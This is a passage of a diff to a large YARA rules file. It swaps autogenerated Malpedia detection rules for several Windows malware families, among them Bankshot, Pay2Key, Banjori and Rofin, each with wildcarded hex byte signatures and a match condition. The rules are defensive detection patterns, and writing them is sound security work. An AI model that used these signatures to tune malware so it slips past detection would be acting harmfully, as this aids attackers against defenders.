-		$sequence_76 = { 8b7508 e8???????? 33f6 3975fc 7410 ff75fc }
-		$sequence_77 = { 0f854affffff 894330 e9???????? 55 }
-		$sequence_78 = { 85ff 0f845d010000 8b4730 a808 7412 }
-		$sequence_79 = { c744242000010000 ff15???????? 4883f8ff 488bf8 7442 }
-		$sequence_80 = { ff35???????? 8945f8 ff15???????? 8bd8 3bde }
-		$sequence_81 = { e8???????? 3bfe 740e 57 56 ff35???????? ff15???????? }
-		$sequence_82 = { ff15???????? 53 56 ff35???????? ff15???????? 5b }
-		$sequence_83 = { 53 e8???????? 85c0 0f8544010000 8b472c a801 }
-		$sequence_84 = { ff5214 8bf7 8bfe e8???????? 5f 5e 5b }
-		$sequence_85 = { ff15???????? 4885db 740c 4c8b0d???????? e9???????? }
-		$sequence_86 = { e8???????? 85c0 7507 33db 895d08 }
-		$sequence_87 = { ff15???????? 488bcf 48870d???????? 483bcf 7405 e8???????? ba01000000 }
-		$sequence_88 = { 33d2 ff15???????? 483bc3 4c8be8 }
-		$sequence_89 = { 85d2 4d8bf1 458bf8 8bc2 }
-		$sequence_90 = { 50 57 e8???????? e9???????? 68???????? }
-		$sequence_91 = { c9 c20400 51 56 ff74240c }
-		$sequence_92 = { 8a4b1c 488b4558 4c8b4d30 4c8b4510 }
-		$sequence_93 = { e8???????? 8d45fc 50 8b4508 e8???????? 85c0 }
-		$sequence_94 = { 33d2 498bcc 498bfd e8???????? 493bc5 7405 }
-		$sequence_95 = { 33d2 ff15???????? 8b05???????? 418bdd }
-		$sequence_96 = { 410fb64101 33d2 488d0cc3 48890d???????? }
-		$sequence_97 = { 6a00 ff35???????? ff15???????? 33db 6a01 e8???????? }
-		$sequence_98 = { 448be8 418b4310 41394308 410f474308 }
-		$sequence_99 = { 48890d???????? 410fb64102 488d0cc3 48890d???????? }
-		$sequence_100 = { 488bce ff15???????? 488b0d???????? 33d2 4c63c0 }
-		$sequence_101 = { c3 418bd8 4803df 410fb64101 }
-		$sequence_102 = { 48890d???????? 410fb64103 488d0cc3 48890d???????? }
-		$sequence_103 = { 33db 895d08 eb03 8b5d08 }
-		$sequence_104 = { 5b c3 a1???????? 83c040 50 ff15???????? }
-		$sequence_105 = { 33442410 8bf0 8932 83c204 ff4c240c 75e6 }
-		$sequence_106 = { 8bf1 05fefeffff 33db 33c9 }
-		$sequence_107 = { ff15???????? 8ac3 5b c9 c20400 53 }
-		$sequence_108 = { 0f8386000000 488b18 8364245800 33c0 21442450 }
-		$sequence_109 = { 53 53 53 53 ff7614 }
-		$sequence_110 = { 8b02 43 8acb d3c0 33c6 33442410 8bf0 }
-		$sequence_111 = { 8b3d???????? 56 ffd7 53 56 }
-		$sequence_112 = { c9 c20400 53 56 8bf0 8a06 }
-		$sequence_113 = { 83c204 ff4c240c 75e6 5e 5b c20800 }
-		$sequence_114 = { 41b905000000 488bd8 ff15???????? 488bcb }
-		$sequence_115 = { 741d 3dd2100000 7416 a1???????? 83c004 }
-		$sequence_116 = { 6a00 ff35???????? ffd3 8bd8 85db 7476 }
-		$sequence_117 = { 754f 488d4c246c 66ba2e00 ff15???????? 488bf0 }
-		$sequence_118 = { e9???????? 33c9 bb26040000 48870d???????? 4885c9 }
-		$sequence_119 = { 488bce ff15???????? 4c8d4c2450 4c8d442458 }
-		$sequence_120 = { ff15???????? 488d542440 488bcd ff15???????? 4883f8ff 4c8be0 }
-		$sequence_121 = { 33d2 ff15???????? 33ff 4885ff }
-		$sequence_122 = { 4c8d442458 8d5001 488bce e8???????? 85c0 }
-		$sequence_123 = { 4533c9 4889442428 215c2420 4533c0 }
-		$sequence_124 = { ff15???????? 488bf0 488d44246c 2bf0 443bf3 8bc3 7408 }
-		$sequence_125 = { 8d442430 50 8d442428 50 8d442428 50 }
-		$sequence_126 = { 4883f8ff 4c8be0 0f8583000000 488b0d???????? }
-		$sequence_127 = { 488bd6 ff15???????? eb14 488b0d???????? }
-		$sequence_128 = { 3bc3 7fbd 83c701 e9???????? 488b8424c8010000 498bcc bb01000000 }
-		$sequence_129 = { 458be0 bb08000000 e8???????? 85c0 }
-		$sequence_130 = { b922010000 e9???????? b90a010000 e9???????? }
-		$sequence_131 = { 53 56 8bf1 05fefeffff }
-		$sequence_132 = { 215c2420 4533c9 4533c0 33d2 ff15???????? 85c0 7511 }
-		$sequence_133 = { 803f2a 750b 4883c701 83c3ff }
-		$sequence_134 = { e9???????? 488bcb ff15???????? a810 }
-		$sequence_135 = { 458bc4 418bcd e8???????? e9???????? b909010000 e9???????? }
-		$sequence_136 = { 488bc8 ff15???????? 8b05???????? 3d2caedb8b }
-		$sequence_137 = { a1???????? 25efff0000 0bc2 e9???????? }
-		$sequence_138 = { 41be01000000 33c9 418bd6 ff15???????? }
-		$sequence_139 = { 4c63c0 33d2 4983c00c ff15???????? }
-		$sequence_140 = { 895df4 895df0 c745f857000000 bf19010000 }
-		$sequence_141 = { 7520 41390424 741a 498d4c2401 }
-		$sequence_142 = { ff15???????? 488b0d???????? 448bc0 8bd8 33d2 4983c001 }
-		$sequence_143 = { 6a03 8935???????? 8935???????? 8935???????? }
-		$sequence_144 = { 5f c20400 55 8bec 83e4f8 81ec9c000000 }
-		$sequence_145 = { 53 8bc7 e8???????? 8d4618 8b08 50 }
-		$sequence_146 = { 5e 33c0 c9 c20400 55 8bec 51 }
-		$sequence_147 = { 44892d???????? e9???????? 4533c0 33d2 33c9 e8???????? e9???????? }
-		$sequence_148 = { 750a 488bcf e8???????? 8bd8 488b0d???????? }
-		$sequence_149 = { 488d542438 488bcb e8???????? eb02 }
-		$sequence_150 = { 57 4154 4155 4156 4883ec50 488bf1 }
-		$sequence_151 = { ff7508 8bc6 e8???????? 8b06 8b08 57 }
-		$sequence_152 = { 488b0d???????? 4889040f 4883c708 492bf6 }
-		$sequence_153 = { 6a20 40 50 ffd6 }
-		$sequence_154 = { 488bcb ff15???????? 8bc8 ff15???????? 21b42410020000 }
-		$sequence_155 = { c3 488d82204a0000 488982284a0000 488900 }
-		$sequence_156 = { 458bc4 418bcd e8???????? 8b842410020000 4c8d9c24f0010000 498b5b28 }
-		$sequence_157 = { 21442428 488b8c2428020000 488364242000 448d4803 4533c0 488bd3 }
-		$sequence_158 = { 33d2 ff15???????? 83bc241002000000 7416 488d942410020000 }
-		$sequence_159 = { 7424 3d5c80689f 740c 44892d???????? e9???????? }
-		$sequence_160 = { 7417 4863461c 2b6e1c 4c03e8 488b4610 48894718 4883661000 }
-		$sequence_161 = { 7412 ff7508 e8???????? eb03 33c0 }
-		$sequence_162 = { 33ed 57 3bc5 740c }
-		$sequence_163 = { 7405 e8???????? 4883c428 c3 488d82204a0000 }
-		$sequence_164 = { 4155 4881ecf0010000 33f6 33c0 }
-		$sequence_165 = { 4533c0 488bd3 ff15???????? 488b8c2428020000 }
-		$sequence_166 = { e8???????? 85c0 0f85e8000000 488b4608 488b0e 4533c9 }
-		$sequence_167 = { e8???????? 488b0d???????? 4c8bc3 33d2 ff15???????? 488b0d???????? 4c8bc7 }
-		$sequence_168 = { 84c0 0f89a3000000 8b434c a804 }
-		$sequence_169 = { 488d4c2430 448bcf 4533c0 e8???????? 483bc3 488905???????? 0f8403010000 }
-		$sequence_170 = { 85c0 0f8561010000 8b4348 a801 742c 488b0b }
-		$sequence_171 = { e8???????? 85c0 0f859b000000 4863533c 488b4608 488b0e 48035334 }
-		$sequence_172 = { 33d2 33c9 e8???????? 85c0 0f8561010000 8b4348 }
-		$sequence_173 = { 217b3c eb0b 8b434c 84c0 0f89a3000000 }
-		$sequence_174 = { ffc1 807c043000 7531 8bd3 }
-		$sequence_175 = { ba10000000 488bc8 e8???????? 48898424e0010000 }
-		$sequence_176 = { 488bf8 4885c0 7427 488d542420 }
-		$sequence_177 = { 8bd8 85c0 0f85f3010000 4c8b842418020000 8d5808 488d8c24b0000000 }
-		$sequence_178 = { 488d542420 b901020000 ff15???????? 85c0 }
-		$sequence_179 = { 488bcd 89442428 488b842410020000 4889442420 e8???????? 8bd8 }
-		$sequence_180 = { 488d542448 488bc8 458bf9 33ff e8???????? 4c8be8 4885c0 }
-		$sequence_181 = { 4c89642448 ff15???????? 8bd8 83f8ff }
-		$sequence_182 = { 4c8be8 4885c0 7508 8d5f08 e9???????? 8b842420020000 4c8b442440 }
-		$sequence_183 = { 7451 0fb70b 0fb76b02 0fb7d1 01f2 6683f9ff 896c2428 }
-		$sequence_184 = { 896c2428 7508 8b5304 83c304 01f2 8b4c241c }
-		$sequence_185 = { 40 c1ca08 e2e4 c9 c20c00 83ec10 53 }
-		$sequence_186 = { 0fb6ca 01cb 30c9 eb59 8b4c242c 0fb6d0 01d1 }
-		$sequence_187 = { 56 90 57 51 8b742420 8b7c241c }
-		$sequence_188 = { 56 57 51 90 8b742428 8b7c2424 8b4c2420 }
-		$sequence_189 = { 01d5 01d3 b101 3b5c2428 0f8266ffffff }
-		$sequence_190 = { 83e603 750c 8b5d10 6601da }
+		$sequence_0 = { 83c414 85c0 0f8473ffffff 6a06 }
+		$sequence_1 = { 740a 68???????? e9???????? 8d45c0 }
+		$sequence_2 = { 744d 8d85d8feffff 50 56 e8???????? 85c0 }
+		$sequence_3 = { 6a0f f3ab 66ab aa 59 33c0 8d7d81 }
+		$sequence_4 = { 57 33db b9ff630000 33c0 }
+		$sequence_5 = { e9???????? 8d45c0 68???????? 50 ff15???????? }
+		$sequence_6 = { 8a4c0588 884c05c0 40 83f840 72ec }
+		$sequence_7 = { 50 ff15???????? 8d85acfeffff 50 e8???????? 80bc05abfeffff5c 59 }
+		$sequence_8 = { 0fbec1 83e81d c3 80f961 7c0c 80f97a }
+		$sequence_9 = { 8bc7 5f 5e c3 ff15???????? 6a09 }
 
 	condition:
-		7 of them and filesize < 2940928
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Badnews_Auto : FILE
+rule MALPEDIA_Win_Bankshot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cbdbb9b6-fd8f-59db-ab40-2a7ebd7420e8"
+		id = "86c817d0-2034-5c81-834f-97c8e0010057"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.badnews_auto.yar#L1-L206"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bankshot_auto.yar#L1-L425"
 		license_url = "N/A"
-		logic_hash = "615a11c7b728bb1d1522af864993baf4e6b235251c7ea78cc85debae2cde79de"
+		logic_hash = "c44d83d86e3231c57414d81c161d108153b74cf74b3e3cc50eaea1f55952d16d"
 		score = 75
-		quality = 73
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -82259,43 +82525,67 @@ rule MALPEDIA_Win_Badnews_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 83c404 68???????? 6804010000 ff15???????? }
-		$sequence_1 = { 83e957 eb02 33c9 c0e004 02c1 3423 c0c003 }
-		$sequence_2 = { c78534ffffff47657457 c78538ffffff696e646f c7853cffffff77546578 66c78540ffffff7457 }
-		$sequence_3 = { c705????????55736572 c705????????33322e64 66c705????????6c6c c605????????00 }
-		$sequence_4 = { 55 8bec 8b450c 3d01020000 }
-		$sequence_5 = { 33c5 8945fc 53 56 57 8d8534ffffff }
-		$sequence_6 = { 68???????? 6a1a 68???????? 57 }
-		$sequence_7 = { 6a00 d1f9 68???????? 03c9 }
-		$sequence_8 = { 56 ffd3 85c0 7403 83c608 }
-		$sequence_9 = { 57 6a00 6880000000 6a04 6a00 6a01 6a04 }
-		$sequence_10 = { 8bf0 56 ff15???????? 50 6a40 }
-		$sequence_11 = { ff15???????? 85c0 7405 83c004 eb02 }
-		$sequence_12 = { ff15???????? b8???????? 83c424 8d5002 668b08 83c002 }
-		$sequence_13 = { c745e4f0b10110 a1???????? eb1a c745e4ecb10110 a1???????? }
-		$sequence_14 = { 8b0485d0a70110 f644010480 0f8432030000 e8???????? 33c9 8b406c 3988a8000000 }
-		$sequence_15 = { c1e306 894df4 895ddc 8b148dd0a70110 8a441a04 a801 0f84fe060000 }
-		$sequence_16 = { 6a53 8885d4fdffff 8d85d5fdffff 6a00 }
-		$sequence_17 = { 898518e5ffff 8b8528e5ffff 8b0485d0a70110 89853ce5ffff 397c0138 }
-		$sequence_18 = { 3bd1 72e4 660f6f05???????? 68???????? f30f7f8558fbffff e8???????? }
-		$sequence_19 = { f3a4 8d8d2cfdffff 49 8d4900 }
-		$sequence_20 = { 84c0 75f7 8da42400000000 ffb554fbffff }
+		$sequence_0 = { 8bf8 8d5101 8a01 41 84c0 75f9 57 }
+		$sequence_1 = { 81ec48040000 a1???????? 33c5 8945f8 53 }
+		$sequence_2 = { 7ccb 3bca 0f8d20f8ffff 0f1f00 80b40ddc3dffffaa 41 }
+		$sequence_3 = { 83faff 747b 33c9 85d2 7e77 }
+		$sequence_4 = { 83c40c e8???????? 99 b907000000 }
+		$sequence_5 = { 57 50 e8???????? 83c40c 6b45e430 8945e0 8d80d0e10110 }
+		$sequence_6 = { 8d90c4e10110 5f 668b02 8d5202 668901 8d4902 83ef01 }
+		$sequence_7 = { 8bb5a838ffff 8d8db438ffff 68???????? 894608 c70610000000 c7460400000000 }
+		$sequence_8 = { 8945e0 8d80d0e10110 8945e4 803800 8bc8 7435 8a4101 }
+		$sequence_9 = { ffd7 c785c03affff00000000 8b85bc3affff 85c0 }
+		$sequence_10 = { 85db 7507 c746340c7b0110 57 ff7634 }
+		$sequence_11 = { e8???????? 83c404 89861c020000 8b45e0 8d4e0c 6a06 8d90c4e10110 }
+		$sequence_12 = { 7515 8b45fc 817848b8e40110 7409 ff7048 e8???????? 59 }
+		$sequence_13 = { c7832005000000008000 eb4e b9???????? 8d85d4fdffff }
+		$sequence_14 = { e9???????? 57 33ff 8bcf 8bc7 894de4 3998c0e10110 }
+		$sequence_15 = { 8b4508 c700???????? 8b4508 898850030000 8b4508 59 c74048b8e40110 }
+		$sequence_16 = { 0f10440b10 0f28ca 660fefc8 0f114c0b10 83c120 3bce 7cd9 }
+		$sequence_17 = { 33c0 8996a0af0600 668b04dd66734100 83fb02 898694af0600 }
+		$sequence_18 = { 83c101 894df8 837df803 0f83d2000000 6a04 }
+		$sequence_19 = { eb3a 81c694010000 740e f30f7e06 660fd685ccfeffff eb24 }
+		$sequence_20 = { 7506 8d4707 50 eb01 57 8d7e10 }
+		$sequence_21 = { 894df8 837dd8ff 7464 6a00 }
+		$sequence_22 = { ff15???????? 4885c0 0f8482000000 48ffc3 4a89042f 488d3cdd00000000 }
+		$sequence_23 = { 41 890d???????? 33c0 8b4df4 64890d00000000 }
+		$sequence_24 = { 44897c2420 ff15???????? 488bf8 83caff }
+		$sequence_25 = { 0f84b6000000 488d3ded3e0000 498bf0 b903000000 f3a6 }
+		$sequence_26 = { ba7a341200 488bcf 8905???????? e8???????? 488d0d7d2b0000 }
+		$sequence_27 = { 23f0 68???????? 89b564f2ffff ffd7 68???????? 50 ffd3 }
+		$sequence_28 = { 81fae7030000 7708 81c2e8030000 8910 8b0b 6a00 68e6210000 }
+		$sequence_29 = { c705????????01000000 c705????????05000000 66c705????????3c00 c705????????04000000 e8???????? 68???????? }
+		$sequence_30 = { 0f859b010000 c745e068410110 8b4508 8bcf }
+		$sequence_31 = { 85c0 7543 8b542454 8d4c2458 6884140000 }
+		$sequence_32 = { ff15???????? 68???????? 57 8985ccfbffff ff15???????? }
+		$sequence_33 = { 8bec 8b4508 57 8d3c85108c7100 8b0f 85c9 }
+		$sequence_34 = { 52 e8???????? 8bf0 83c414 f7de 1bf6 }
+		$sequence_35 = { 837d0c00 7455 8b4d0c 51 ff15???????? }
+		$sequence_36 = { ff15???????? 488d1556ea0000 488d4c2420 488905???????? ff15???????? 807c242000 }
+		$sequence_37 = { 448bc1 4a8d4c0d00 4903d4 e8???????? 488b461c ffc7 4883c328 }
+		$sequence_38 = { 52 50 e8???????? 6a02 8d8c24b0080000 6a00 8d54244c }
+		$sequence_39 = { 3bd1 7f1e 6b0d????????3c 030d???????? }
+		$sequence_40 = { 56 57 6884140000 6a40 ff15???????? 8bd8 }
+		$sequence_41 = { e8???????? 488d0de3330000 e8???????? 488d0d87990000 e8???????? 84c0 0f85b6000000 }
+		$sequence_42 = { 8b4c2430 896804 895008 89480c e8???????? }
+		$sequence_43 = { 50 e8???????? 83c404 898568f8ffff 8d8df4fdffff 51 }
+		$sequence_44 = { ff15???????? 488bf8 4885c0 0f84b5000000 }
 
 	condition:
-		7 of them and filesize < 612352
+		7 of them and filesize < 860160
 }
-rule MALPEDIA_Win_Orangeade_Auto : FILE
+rule MALPEDIA_Win_Termite_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a790e493-320f-57de-9b62-d13796c94676"
+		id = "ee31374f-70c6-5ab3-95b3-0fe1e417c08c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.orangeade_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.termite"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.termite_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "bc9cfd6680cc4f32cd41e9edf43afa43b54975c598906df96ea95e31fa6c1612"
+		logic_hash = "f0f791f686acda15650442706f1dd42f13979090335dd24cb4b6c5332386c748"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82309,32 +82599,32 @@ rule MALPEDIA_Win_Orangeade_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bb42428050000 50 8bce e8???????? c744241001000000 }
-		$sequence_1 = { 50 8d942470020000 51 52 ff15???????? }
-		$sequence_2 = { f3ab 66ab aa 8d842468020000 50 }
-		$sequence_3 = { 6881000000 6a00 c784249428010000000000 ff15???????? 8bf0 56 }
-		$sequence_4 = { aa b93f000000 33c0 8dbc2465010000 }
-		$sequence_5 = { 8d4c2424 c684248828010002 e8???????? 8d4c2410 c684248828010001 e8???????? 8d4c2414 }
-		$sequence_6 = { b93f000000 33c0 8d7c2479 885c2478 f3ab }
-		$sequence_7 = { 68???????? 8d4c2410 e8???????? 68???????? 6884000000 53 ff15???????? }
-		$sequence_8 = { e8???????? 83c404 8d4c2424 c684248828010002 }
-		$sequence_9 = { 50 8d4c2410 c684248400000001 e8???????? }
+		$sequence_0 = { 8945f0 8b45f0 3b4510 7426 837df000 }
+		$sequence_1 = { 89e5 837d0800 740a 8b4508 8b4010 85c0 7507 }
+		$sequence_2 = { c745f001000000 837d08ff 750a b8ffffffff e9???????? c785ecfeffff00000000 c745f400000000 }
+		$sequence_3 = { c1e002 05???????? 8b00 8945e0 8b55e4 89d0 c1e002 }
+		$sequence_4 = { c745f000000000 eb46 8b4508 8b5010 8b45f0 6bc074 01d0 }
+		$sequence_5 = { 8b45ec 8b55f0 83c210 89442408 89542404 }
+		$sequence_6 = { 85c0 7432 8b4510 8d48ff 8b4508 8b4008 8b10 }
+		$sequence_7 = { c9 c3 55 89e5 83ec28 c745f400000000 c744240804000000 }
+		$sequence_8 = { 8b4508 8b4004 8d5001 8b4508 895004 8b45f0 8945ec }
+		$sequence_9 = { 8b45f0 89442404 8b4508 890424 e8???????? 8945e8 8b450c }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 312320
 }
-rule MALPEDIA_Win_Lambload_Auto : FILE
+rule MALPEDIA_Win_Pay2Key_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8b136788-015d-54fc-bdcb-34985ee91d28"
+		id = "f2fcc621-8979-5801-a21d-ea66a00d4417"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambload"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lambload_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pay2key_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "360d04776b8fecec7b17892571b2e470304fba03fb5a7a2f8f66e392936ecb21"
+		logic_hash = "c5c5a0569f9a48f47100e890ff1d1fd3e4fd615600ef7e4d45ae1b0c294b9a08"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82348,34 +82638,34 @@ rule MALPEDIA_Win_Lambload_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c408 85c0 7510 8b442414 c780a400000010260310 eb67 }
-		$sequence_1 = { 33c9 0fbe9930670610 3bfb 7408 }
-		$sequence_2 = { 5b 3bfb 7d1c 2bdf }
-		$sequence_3 = { 8b6c2424 83c408 3be8 7e02 8be8 }
-		$sequence_4 = { 85db 56 751a 6a62 68???????? }
-		$sequence_5 = { 50 e8???????? ff33 ffb5f0f5ffff }
-		$sequence_6 = { eb16 8d8be8330710 6a0a 8d542424 51 52 e8???????? }
-		$sequence_7 = { 75d7 6a03 5b 3bfb 7d1c 2bdf }
-		$sequence_8 = { 85c0 7529 0fb78c05ecfbffff 66898c05f4fdffff 83c002 663bce }
-		$sequence_9 = { c1e106 030c9500490710 eb05 b9???????? f641247f 75a2 83f8ff }
+		$sequence_0 = { e8???????? 84db 74cc 8ac3 8b4df4 64890d00000000 59 }
+		$sequence_1 = { a1???????? 33c5 50 8d45f4 64a300000000 8965f0 0f1f8000000000 }
+		$sequence_2 = { c745fc00000000 8b4610 85c0 7420 a801 7515 83e0fe }
+		$sequence_3 = { 8bbde0000000 85ff 741f 8bc3 f00fc14704 7516 8b07 }
+		$sequence_4 = { 83c102 84d2 75d8 33c0 }
+		$sequence_5 = { 8b7a08 8bc7 8b5a0c 0bc3 7512 3bca 0f94c0 }
+		$sequence_6 = { 8b4f10 894508 85c9 742f 8908 f6c101 }
+		$sequence_7 = { 50 8d45f4 64a300000000 8b410c 83c10c 6a00 ff5028 }
+		$sequence_8 = { 6a02 50 e8???????? 8b4de4 83c410 3bc1 7716 }
+		$sequence_9 = { d1e8 03c2 3bc1 0f43c8 894df8 8d048d04000000 50 }
 
 	condition:
-		7 of them and filesize < 1039360
+		7 of them and filesize < 2252800
 }
-rule MALPEDIA_Win_R980_Auto : FILE
+rule MALPEDIA_Win_Banjori_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "624a6ffd-b1f3-59a0-9a56-7f82cf4ce201"
+		id = "0fe922ef-f1d7-5df7-a358-1fecc2c2b8e9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.r980_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.banjori_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "ef4f026b46d8c7c29b2c5642311344a13e41f9d1ab13a98be1b516e844609533"
+		logic_hash = "0ea88ecfce727aae78a4405fc075f0c940df492b8f26cbc0ee71a3d10d4f39b8"
 		score = 75
-		quality = 45
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -82387,32 +82677,32 @@ rule MALPEDIA_Win_R980_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 755b 6a04 e8???????? 83c404 8945f0 8bc8 }
-		$sequence_1 = { ff742428 e8???????? 53 8b5c2430 6a00 8d041f 50 }
-		$sequence_2 = { c7458001000000 c7857cffffff26000000 c745843d000000 6a01 57 8d857cffffff 8bcb }
-		$sequence_3 = { 7422 8b55a8 83e1ef 894dd8 894dd4 85d2 7412 }
-		$sequence_4 = { 8955fc 8bc4 8965e8 c7401407000000 895010 83781408 7202 }
-		$sequence_5 = { 8bc7 f00fc14104 7515 8b01 ff10 8b4db4 8bc7 }
-		$sequence_6 = { 7279 e8???????? 85c0 7570 6804010000 8d85e0fbffff 50 }
-		$sequence_7 = { e8???????? e9???????? 68???????? 8d4dd8 e8???????? 8d45d8 c745fc01000000 }
-		$sequence_8 = { 8975f0 c745fc00000000 85f6 7416 8d4e08 c645fc01 50 }
-		$sequence_9 = { 8b4634 3b4630 75a5 e9???????? 2b5e10 b801000000 5f }
+		$sequence_0 = { 2b4df4 c1e010 0bc1 8b550c 3902 7506 8b4508 }
+		$sequence_1 = { 66696c653d2768 7474 703a 2f 2f 6a61 626265 }
+		$sequence_2 = { 8bec 83c4d8 57 56 53 33db e8???????? }
+		$sequence_3 = { 81c49cfeffff 57 56 53 33db e8???????? 8945fc }
+		$sequence_4 = { 8b00 85c0 7529 ff75f8 e8???????? 8b7dfc 57 }
+		$sequence_5 = { 83c4d8 57 56 6a0a ff15???????? 391d???????? }
+		$sequence_6 = { ff75f4 ff15???????? ff75f8 e8???????? ff7510 ff750c ff75f4 }
+		$sequence_7 = { 0145f4 6a42 ff75f4 ff75f8 ff15???????? 8945f8 ff75dc }
+		$sequence_8 = { 8b12 80fa30 7504 66c1ea08 663bca 7410 8b45f0 }
+		$sequence_9 = { 57 e8???????? 395dc8 0f843a010000 ff75e4 57 ff15???????? }
 
 	condition:
-		7 of them and filesize < 3178496
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Grabbot_Auto : FILE
+rule MALPEDIA_Win_Rofin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6b177866-b328-5532-b1df-c68c15ec705b"
+		id = "0195ab71-caac-5cd0-8cdc-a4640763982a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grabbot_auto.yar#L1-L163"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rofin_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "c94d3ff4eb131743923dc6cd096207359254fdb038801b45a5051cbbd0d7bf96"
+		logic_hash = "1fdbbf0f641674931110c0fd75e6ced74603c00b71d8e67aaa8404e587da89df"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82426,40 +82716,34 @@ rule MALPEDIA_Win_Grabbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb702 83f85a 770b 83f841 7206 83c020 }
-		$sequence_1 = { 7206 83c020 0fb7c0 83c202 }
-		$sequence_2 = { 770d 83f841 7208 83c020 }
-		$sequence_3 = { 83eb14 83c314 837b0c00 7455 8b430c 034540 }
-		$sequence_4 = { c745ac6f6d4173 c745b06369697a c645b400 c745b84c647247 c745bc65745072 c745c06f636564 }
-		$sequence_5 = { 85c9 7460 83bc188400000005 7656 8bbc18b4000000 }
-		$sequence_6 = { e8???????? 59 81c480000000 50 8bf1 e8???????? e8???????? }
-		$sequence_7 = { 51 53 52 684b49a851 }
-		$sequence_8 = { 56 ffd0 33c9 66894c37fe }
-		$sequence_9 = { 8b0d???????? 894804 8b0d???????? 894808 8b0d???????? 89480c e9???????? }
-		$sequence_10 = { 89480c e9???????? 33c0 e9???????? }
-		$sequence_11 = { 7428 8b0d???????? 8908 8b0d???????? 894804 8b0d???????? }
-		$sequence_12 = { 57 8d7c000c 57 e8???????? }
-		$sequence_13 = { 8bf0 85f6 741d 8d4601 }
-		$sequence_14 = { e8???????? 85c0 56 0f9fc3 e8???????? 83c414 }
-		$sequence_15 = { 741e 57 56 6aff }
+		$sequence_0 = { 49 8bd9 83fbfd 7605 e8???????? 8b6c245c 8b4d04 }
+		$sequence_1 = { 837c243c0a 7568 8b54241c 52 ff15???????? 89442410 8b44241a }
+		$sequence_2 = { 56 ff15???????? 8be8 ffd3 56 ff15???????? 33c0 }
+		$sequence_3 = { e8???????? 83c404 895c2418 8b84240c090000 3bc3 7409 50 }
+		$sequence_4 = { 53 8bc8 8a1c38 c1f903 8d3411 8bc8 83e107 }
+		$sequence_5 = { 3bc1 720a c744241202000000 eb3d 8b4c2422 8b461c 3bc8 }
+		$sequence_6 = { f2ae f7d1 49 51 56 8d4c2418 e8???????? }
+		$sequence_7 = { 3bc8 745d 8b4610 85c0 741b 8b7e0c 8d5f10 }
+		$sequence_8 = { ff15???????? 83f8ff 7508 ff15???????? 8bd8 8d54240c c744240c00000000 }
